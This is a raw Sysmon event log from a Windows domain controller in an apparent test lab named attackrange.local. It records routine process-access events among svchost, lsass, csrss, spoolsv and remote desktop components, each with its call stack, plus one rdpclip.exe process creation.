13:29:55.357{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009796Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.357{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009795Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.357{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009794Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.357{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009793Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.357{08A6967A-4288-6000-0F00-000000009A01}11241288C:\Windows\System32\svchost.exe{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\termsrv.dll+37d29|c:\windows\system32\termsrv.dll+f4fc|c:\windows\system32\termsrv.dll+1aa1b|c:\windows\system32\termsrv.dll+19ad3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 154100x80000000000000009792Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.361{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe10.0.14393.3503 (rs1_release.200131-0410)RDP Clipboard MonitorMicrosoft® Windows® Operating SystemMicrosoft Corporationrdpclip.exerdpclipC:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4752-6000-9133-2D0000000000}0x2d33912HighMD5=D887E718FB0F4C99B9F01C5BD59F8B90,SHA256=ACFA1128B4EDD953F6364FA6216337A59C0522A01349263A11259A827838A56F,IMPHASH=5A464814303942D42A66B561CF697F26{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k termsvcs 10341000x80000000000000009791Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.342{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009790Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.326{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4753-6000-0B05-000000009A01}1384C:\Windows\system32\TSTheme.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009789Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.326{08A6967A-4288-6000-1000-000000009A01}11364692C:\Windows\system32\svchost.exe{08A6967A-4753-6000-0B05-000000009A01}1384C:\Windows\system32\TSTheme.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009788Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.326{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-4753-6000-0B05-000000009A01}1384C:\Windows\system32\TSTheme.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009787Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.326{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2B00-000000009A01}2680C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009786Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.232{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009785Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.232{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009784Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.232{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009783Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.185{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009782Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.185{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009781Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.185{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009780Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.185{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009779Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.185{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009778Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.185{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009777Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.185{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009776Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.185{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|c:\windows\system32\lsm.dll+23fc9|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009775Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.185{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23fc1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009774Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4298-6000-2B00-000000009A01}26803564C:\Windows\System32\spoolsv.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\spoolsv.exe+1aea3|C:\Windows\System32\spoolsv.exe+1ad09|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+5296b|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009773Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009772Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4750-6000-0205-000000009A01}47883780C:\Windows\system32\csrss.exe{08A6967A-4753-6000-0B05-000000009A01}1384C:\Windows\system32\TSTheme.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009771Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 